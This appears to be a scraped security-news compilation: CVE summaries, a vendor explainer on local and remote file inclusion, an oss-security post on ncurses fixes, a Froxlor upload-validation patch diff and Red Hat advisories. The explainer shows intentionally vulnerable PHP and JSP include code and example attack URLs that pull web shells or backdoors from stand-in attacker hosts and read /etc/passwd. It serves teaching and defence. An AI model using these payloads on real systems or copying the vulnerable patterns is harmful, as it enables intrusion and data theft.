Online Pizza Ordering v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.

CVE-2023-29627: File uploads | Web Security Academy

Purchase Order Management v1.0 was discovered to contain an arbitrary file upload vulnerability which allows attackers to execute arbitrary code via a crafted file uploaded to the server.

In this article we will cover:

*   What are File Inclusion Vulnerabilities?
*   Types of file inclusion vulnerabilities
    *   Local File Inclusion (LFI)
        *   Local File Inclusion (LFI) Example
    *   Remote File Inclusion (RFI)
        *   Remote File Inclusion (RFI) Example
        *   RFI prevention and mitigation
*   File inclusion vulnerabilities in common programming languages with examples
    *   File inclusion in PHP
        *   Example of an file Inclusion vulnerability in PHP
    *   JavaServer Pages (JSP)
        *   Example of an File Inclusion vulnerability in JSP
    *   Server Side Includes (SSI)
        *   Example of an File Include vulnerability in SSI
*   How can Bright help prevent File Inclusion vulnerabilities?

**What are File Inclusion Vulnerabilities?**

File Inclusion vulnerabilities often affect web applications that rely on a scripting run time, and occur when a web application allows users to submit input into files or upload files to the server. They are often found in poorly-written applications.

File Inclusion vulnerabilities allow an attacker to read and sometimes execute files on the victim server or, as is the case with Remote File Inclusion, to execute code hosted on the attacker’s machine.

An attacker may use remote code execution to create a web shell on the server, and use that web shell for website defacement.

**Types of file inclusion vulnerabilities**

File inclusion vulnerabilities come in two types, depending on the origin of the included file:

– Local File Inclusion (LFI)  
– Remote File Inclusion (RFI)

**Local File Inclusion (LFI)**

A Local File Inclusion attack is used to trick the application into exposing or running files on the server. They allow attackers to execute arbitrary commands or, if the server is misconfigured and running with high privileges, to gain access to sensitive data.

These attacks typically occur when an application uses the path to a file as input. If the application treats that input as trusted, an attacker can use the local file in an include statement.

While Local File Inclusion and Remote File Inclusion are very similar, an attacker using LFI may include only local files.

**Local File Inclusion (LFI) Example**

/**  
* Get the filename from a GET input  
* Example - http://example-website.com/?file=filename.php  
*/  
$file = $_GET[‘file’];

/**  
* Unsafely include the file  
* Example - filename.php  
*/  
include(‘directory/’ . $file);

In the example above the attacker’s intent is to trick the application into executing a PHP script, such as a web shell

http://example-website.com/?file=../../uploads/malicious.php

Once a user runs the web application, the file uploaded by the attacker will be included and executed. This will allow the attacker to run any server-side code that he wants.

Learn more about local file inclusion attack – https://brightsec.com/blog/local-file-inclusion-lfi/

**Remote File Inclusion (RFI)**

An attacker who uses Remote File Inclusion targets web applications that dynamically reference external scripts. The goal of the attacker is to exploit the referencing function in the target application and to upload malware from a remote URL, located on a different domain.

The results of a successful RFI attack can be information theft, a compromised server and a site takeover, resulting in content modification.

**Remote File Inclusion (RFI) Example**

This example illustrates how Remote File Inclusion attacks work:

1.  A JavaServer Pages page containing the following code:

<jps:include page=”<%=(String)request.getParameter(“ParamName”)%>”> 

can be manipulated with the following request: 

Page1.jsp?ParamName=/WEB-INF/DB/password.

After the application processes the request, it will reveal the content of the password file.

2.  The application has an import statement that requests content from a URL address: 

<c:import url=”<*request.getParameter(“conf”)%>”>.

The same input statement can be used for malware injection if the statement is unsanitized.

For example: 

Page2.jsp?conf=https://evil-website.com/attack.js

3.  An attacker will often launch a Remote File Inclusion attack by manipulating the request parameters so that they refer to a remote, malicious file.

For example, consider the following code:

$incfile = $_REQUEST[“file”];  
include($incfile.”.php”);

1.  $incfile = $_REQUEST[“file”]; – extracts the file parameter value from the HTTP request.

2.  include($incfile.”.php”); – uses that value to dynamically set the file name.

If you don’t have proper sanitization in place, this code can be exploited, resulting in unauthorized file uploads.

For example, this URL string:

http://www.example-website.com/vulnerable_page.php?file=http://www.attacker.com/backdoor

contains an external reference to a backdoor file stored in a remote location (http://www.attacker.com/backdoor\_shell.php.)

Once uploaded to the application, this uploaded backdoor can be later used to hijack the server or gain access to the application database.

**RFI prevention and mitigation**

To minimize the risk of RFI attacks, proper input validation and sanitization has to be implemented. Ensure you don’t fall victim of the misconception that all user inputs can be fully sanitized. Look at sanitization only as an additive to a dedicated security solution.

Sanitize the user supplied or controlled input the best you can including:

*   HTTP header values
*   URL parameters
*   Cookie values
*   GET/POST parameters

Check the input fields against a whitelist. An attacker can supply input in a different format (encoded or hexadecimal formats) and bypass a blacklist.

Client-side validation comes with the benefit of reduced processing overhead, but they are vulnerable to attacks by proxy tools, so apply the validation on the server end.

Make sure you restrict execution permissions for the upload directories, maintain a whitelist of acceptable files types, and restrict upload file sizes.

**File inclusion vulnerabilities in common programming languages with examples****File inclusion in PHP**

The main cause of File Inclusion vulnerabilities in PHP, is the use of unvalidated user-input with a filesystem function that includes a file for execution – most notable being the include and require statements. In PHP 5.x the allow\_url\_include directive is disabled by default, but be cautious with applications written in older PHP versions, because before 5.x allow\_url\_include was enabled by default.

The goal of the attacker is to alter a variable that is passed to one of these functions, to cause it to include malicious code from a remote resource.

To mitigate the risk of File Inclusion vulnerabilities in PHP, make sure all user input is validated before it’s being used by the application.

**Example of an file Inclusion vulnerability in PHP**

<?php  
If (isset($_GET[‘language’])) {  
     include($_GET[‘language’] . ‘.php’);  
}  
?>

<form method=”get”>  
          <select name=”language”>  
                   <option value=”english”>English</option>  
                   <option value=”french”>French</option>  
                   …  
          </select>  
          <input type=”submit”>  
</form>

The developer intended to read in english.php or french.php, which will alter the application’s behavior to display the language of the user’s choice. But it is possible to inject another path using the language parameter. 

For example:

*   /vulnerable.php?language=http://evil.example.com/webshell.txt? – injects a remotely hosted file containing a malicious code (remote file include)
*   /vulnerable.php?language=C:\\ftp\\upload\\exploit – Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
*   /vulnerable.php?language=C:\\notes.txt%00 – example using NULL meta character to remove the .php suffix, allowing access to files other than .php. Note, this use of null byte injection was patched in PHP 5.3, and can no longer be used for LFI/RFI attacks.
*   /vulnerable.php?language=../../../../../etc/passwd%00 – allows an attacker to read the contents of the etc/passwd file on a Unix-like system through a directory traversal attack.
*   /vulnerable.php?language=../../../../../proc/self/environ%00 – allows an attacker to read the contents of the /proc/self/environ file on a Unix-like system through a directory traversal attack. An attacker can modify a HTTP header (such as User-Agent) in this attack to be PHP code to exploit remote code execution.

The best solution in this case is to use a whitelist of accepted language parameters. If a strong method of input validation, such as a whitelist, cannot be used, then rely upon input filtering or validation of the passed-in path to make sure it does not contain unintended characters and character patterns. However, this may require anticipating all possible problematic character combinations. A safer solution is to use a predefined Switch/Case statement to determine which file to include rather than use a URL or form parameter to dynamically generate the path.

**JavaServer Pages (JSP)**

JavaServer Pages (JPS) is a scripting language which can include files for execution at runtime.

**Example of an File Inclusion vulnerability in JSP**

<%  
String p = request.getParameter(“p”);  
@include file=”<%=”includes/” + p +”.jsp”%>”  
%>

*   /vulnerable.jps?p=../../../../var/log/access.log%00 – Unlike PHP, JSP is still affected by Null byte injection, and this param will execute JSP commands found in the web server’s access log.

**Server Side Includes (SSI)**

Although a Server Side Include is uncommon and not typically enabled on a default web server, it can be used to gain remote code execution on a vulnerable web server.

**Example of an File Include vulnerability in SSI**

The following code is vulnerable to a remote-file inclusion vulnerability:

<!DOCTYPE html>  
<html>  
<head>  
<title>Test file</title>  
<head>  
<body>  
  
</body>  
</html>

The above code is not an XSS vulnerability, but rather including a new file to be executed by the server.

**How can Bright help prevent File Inclusion vulnerabilities?**

As mentioned, input sanitization and proper file management practices are almost never sufficient on their own, even if they effectively minimize the risk of File Inclusion. This is important, as many attacks succeed as a result of a false sense of security, which is encouraged by DIY practices. 

Bright can scan your web applications to detect File Inclusion vulnerabilities. 

**Build Secure Applications. FAST**

Whether as a standalone scanner to test your production ready web applications or seamlessly integrated into your CI/CD pipelines, developer friendly remediation guidelines are provided, with all the relevant information you need to understand the issue and fix it, with no false positives. 

In terms of reporting, a diff-like view is provided, highlighting what the engine did to exploit the vulnerability, like in the Local File Inclusion below:

https://example-site/bar/file=content.ini..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Bright indicates the original part in red, with the green part representing what was added by the tool.

You can start testing for File Inclusion vulnerabilities today with Bright. Get a free account here – https://app.brightsec.com/signup

CVE-2023-29621: File Inclusion Vulnerabilities: What are they and how do they work?

ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[<thread-prev\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 13 Apr 2023 13:33:56 -0500
From: Mark Esler <mark.esler@...onical.com>
To: oss-security@...ts.openwall.com
Subject: Re: ncurses fixes upstream

On 4/12/23 15:40, Jonathan Bar Or (JBO) wrote:

> Hello oss-security,
>
> Our team has worked with the maintainer of the ncurses library (used by several software packages in Linux) to fix several memory corruption vulnerabilities.
> They are now fixed at commit 20230408 - see details here (https://invisible-island.net/ncurses/NEWS.html#index-t20230408)
> A CVE was assigned (CVE-2023-29491) - it's still under a "reserved" status.
>
> How can we ensure those fixes get deployed upstream, in major Linux distributions?

(distros maintain "downstream" versions of the ncurses "upstream")

Ideally, a security patch should only include security relevant changes. 
If a bunch of a documentation or miscellaneous changes are added, it 
makes backporting difficult (i.e., the non-security relevant changes may 
not be desired or cause the patch to not apply cleanly to old versions 
of ncurses). The upstream patch is already made, but that's what I'd 
recommend for future patches. If there's a regression as Alice suggests, 
that might be a good opportunity to redo the patch format.

http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56

When you publish the CVE json5, you can references the patch URL and 
relevant bug discussions to help downstream. Including the CVE number in 
the patch commit is also quite helpful.

Thank you!

> We've reached out to Arch, RedHat, Canonical and other popular distros independently.
Which email did you contact Canonical with? I cannot find anything 
recent for ncurses on security@...ntu.com
>
> Thanks!
>                               JBO
>
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-29491: security - Re: ncurses fixes upstream

Unrestricted Upload of File with Dangerous Type in GitHub repository froxlor/froxlor prior to 2.0.14.

@@ -28,6 +28,7 @@ use Exception; use Froxlor\\Database\\Database; use Froxlor\\UI\\Form; use Froxlor\\Validate\\Validate; use PDO;  
/\*\* @@ -159,6 +160,9 @@ public static function import($json\_str = null) // re-format the array-key for Form::processForm foreach ($\_data as $key => $value) { $index\_split = explode('.', $key, 3); if (!isset($current\_settings\[$index\_split\[0\]\]\[$index\_split\[1\]\])) { continue; } if (isset($index\_split\[2\]) && $index\_split\[2\] === 'image\_data' && !empty($\_data\[$index\_split\[0\] . '.' . $index\_split\[1\]\])) { $image\_data\[$key\] = $value; } else { @@ -190,42 +194,27 @@ public static function import($json\_str = null) } }  
$img\_data = base64\_decode($value); $img\_filename = Froxlor::getInstallDir() . '/' . str\_replace('../', '', explode('?', $\_data\[$index\_split\[0\] . '.' . $index\_split\[1\]\], 2)\[0\]);  
file\_put\_contents($img\_filename, $img\_data);  
if (function\_exists('finfo\_open')) { $finfo = finfo\_open(FILEINFO\_MIME\_TYPE); $mimetype = finfo\_file($finfo, $img\_filename); finfo\_close($finfo); } else { $mimetype = mime\_content\_type($img\_filename); } if (empty($mimetype)) { $mimetype = 'application/octet-stream'; } if (!in\_array($mimetype, \['image/jpeg', 'image/jpg', 'image/png', 'image/gif'\])) { @unlink($img\_filename); throw new Exception("Uploaded file is not a valid image"); }  
$spl = explode('.', $img\_filename); $file\_extension = strtolower(array\_pop($spl)); unset($spl);  
if (!in\_array($file\_extension, \[ 'jpeg', 'jpg', 'png', 'gif' \])) { @unlink($img\_filename); throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif"); if (Validate::validateBase64Image($value)) { $img\_data = base64\_decode($value); $img\_filename = explode('?', $\_data\[$index\_split\[0\] . '.' . $index\_split\[1\]\], 2)\[0\];  
$spl = explode('.', $img\_filename); $file\_extension = strtolower(array\_pop($spl)); unset($spl);  
if (!in\_array($file\_extension, \[ 'jpeg', 'jpg', 'png', 'gif' \])) { throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif"); } $img\_filename = 'img/' . bin2hex(random\_bytes(16)) . '.' . $file\_extension; file\_put\_contents(Froxlor::getInstallDir() . '/' . $img\_filename, $img\_data); $img\_index = $index\_split\[0\].'.'.$index\_split\[1\]; Settings::Set($img\_index, $img\_filename . '?v=' . time()); }  
Settings::Set($index, $value); } } // all good

CVE-2023-2034: better validation for uploaded/imported image files · Froxlor/Froxlor@f36bc61

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. Data loading jobs in gsql_server, created by any user with designer permissions, can read sensitive data from arbitrary locations.

CVE-2023-22950: Data Loading Vulnerability

Red Hat Security Advisory 2023-1765-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.17 security update  
Advisory ID:       RHSA-2023:1765-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1765  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch2.17 is now available in Fast Datapath for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-8] Fast Datapath Release (BZ#2177685)

* [CT] Inner header of ICMP related traffic does not get DNATed  
(BZ#2178200)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177685 - [23.C RHEL-8] Fast Datapath Release  
2178200 - [CT] Inner header of ICMP related traffic does not get DNATed

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.17-2.17.0-88.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.aarch64.rpm

noarch:  
openvswitch2.17-test-2.17.0-88.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQiMWg//d9j3aPfYak2tV8EI9xSItFv6WpoLCB4y  
rC4956fWN4hzmKSYHnrw4uvhEVPf1hsue5zJIO0VHlT5MqmwDn6wDjP//V8GC4lE  
JUmTZHQMcWlt/dZQm2mh2I0n4oR0y/4gY3f4kKXUPM0Mg1S1MAEahmm4S9NWAGF7  
f2nVf1b1PACs3E4QfStldiawDDmwPCe8zsaaCCVL9sIR/KZI6yoZOJu8RjCWHac6  
0kw6LpIDjOwoJ/tc2JMoP/1JORzA+6S0Lrg+ZI8Kd0qwL/6KOcBpgCYXYD1eyp60  
18At7rFMonFlOW2JG8A0ewe6MZDXoyJsWjNZl2xPXsa1tHT/jnK29EbXr14X40kx  
/fpSdiRr1zSfChCPFVedxaBWY9L2UoAUGx6TnGXNuNC1UTM0pseMfUMy7TAC4ZV4  
o6qH7hC4a2W1tOxndAq8MWGeh49pq1n/EjwF+deKU73ke834pwDfQFRO03YB4jjM  
myicYpRKimbd6TzFhunIaKJcEYGX5Jna6nBd50a2b5mfHOS/FKah2fmROTK8bRv8  
202/9CCCGWSzE3IlUT9JcamNcdre0xZHmkYXpyLTuW0keXp+wlb19aVR42ZtRq6L  
U+TiznvhSU3XuH7KxJJS0AQdi+zyBWSR24ADbE70nQfu0nP6hupQBo6Eg2dnhdva  
w5iYSsJ1/AA=J+dO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1765-01

Red Hat Security Advisory 2023-1770-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch3.1 security update  
Advisory ID:       RHSA-2023:1770-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1770  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch3.1 is now available in Fast Datapath for Red Hat  
Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 9 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-9] Fast Datapath Release (BZ#2177688)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177688 - [23.C RHEL-9] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 9:

Source:  
openvswitch3.1-3.1.0-14.el9fdp.src.rpm

aarch64:  
openvswitch3.1-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.aarch64.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.aarch64.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.aarch64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.aarch64.rpm

noarch:  
openvswitch3.1-test-3.1.0-14.el9fdp.noarch.rpm

ppc64le:  
openvswitch3.1-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.ppc64le.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.ppc64le.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.ppc64le.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.ppc64le.rpm

s390x:  
openvswitch3.1-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.s390x.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.s390x.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.s390x.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.s390x.rpm

x86_64:  
openvswitch3.1-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-debuginfo-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-debugsource-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-devel-3.1.0-14.el9fdp.x86_64.rpm  
openvswitch3.1-ipsec-3.1.0-14.el9fdp.x86_64.rpm  
python3-openvswitch3.1-3.1.0-14.el9fdp.x86_64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-14.el9fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaLtzjgjWX9erEAQgWtw//Q8Uf6a/o/eN5OJxyMupZANRTuKoPOXeu  
vUuwVU6oVNklao0FCs3BkMUfoGagZfHqJiVtaJBp48hpHWprZ6CJ6Prc18k/KIkY  
hhN/z42p1fLC+J4JzMuA3cODHVc0JkXuRT1wMfGYfKq4RLPaW6jADVSIGzTIZhc9  
YtppXWcpp5cEgvoF9/NtZspKggFUWuXj4BymJ7fzmxGpDkHkaMMdMX+9+qTevpyP  
Kj0G9YfdmmUGWAaZ3Fm5/vh8otoeTDOU83YgTl+kQrflPg/PJVuTAiJ3cjA+Sl1U  
yZDyUxNwgSwvJ4PJKMif6SrNsvv1PQpxK9UE9Q8JWVlXVwvPw5aHpj9bhk5Kmv3n  
t/x37zdKWPbldBeuQlNpXTNAZ1YFGd5PSzseR8fJXoyinhcT+ATC4mAyWhoq5+B5  
J7NLCxJDXfO8pzBbnv5whaDS3fztXbFpKQC5wC26x/az4Fci2+y2EX9TTxYTyA2P  
JZ0zp4wZpHHk78xoSPOMGuvURwl9NYGPQvLtztg6sOFx/XDwC3fws+SGTkeUJjfw  
xiAdisM4JAujDR0jiMRBe+WkElVF1uaT1KolLQPxu9kxcNuLJ/Qr62kBjsPfgkF0  
feZT3Uui2ZZhuX/F/z74OkKS+ke9dIeN75d6KpYiMfaJdYpRC2rmU6f1aQBfcVik  
dd1tBu49mHM=xop/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1770-01

Red Hat Security Advisory 2023-1747-01 - The Public Key Infrastructure Core contains fundamental packages required by Red Hat Certificate System.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pki-core:10.6 security update  
Advisory ID:       RHSA-2023:1747-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1747  
Issue date:        2023-04-12  
CVE Names:         CVE-2022-2414  
====================================================================  
1. Summary:

An update for the pki-core:10.6 module is now available for Red Hat  
Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Public Key Infrastructure (PKI) Core contains fundamental packages  
required by Red Hat Certificate System.

Security Fix(es):

* pki-core: access to external entities when parsing XML can lead to XXE  
(CVE-2022-2414)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2104676 - CVE-2022-2414 pki-core: access to external entities when parsing XML can lead to XXE

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.src.rpm  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.src.rpm  
pki-core-10.8.4-1.module+el8.2.0+17305+ef598dea.src.rpm  
tomcatjss-7.4.1-2.module+el8.2.0+6294+b7db4606.src.rpm

aarch64:  
jss-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debuginfo-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-debugsource-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
jss-javadoc-4.6.2-12.module+el8.2.0+10554+cf83aa72.aarch64.rpm  
pki-core-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-core-debugsource-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-symkey-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm  
pki-tools-debuginfo-10.8.4-1.module+el8.2.0+17305+ef598dea.aarch64.rpm

noarch:  
ldapjdk-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
ldapjdk-javadoc-4.21.0-2.module+el8.2.0+6294+b7db4606.noarch.rpm  
pki-base-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-base-java-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-ca-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-kra-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
pki-server-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
python3-pki-10.8.4-1.module+el8.2.0+17305+ef598dea.noarch.rpm  
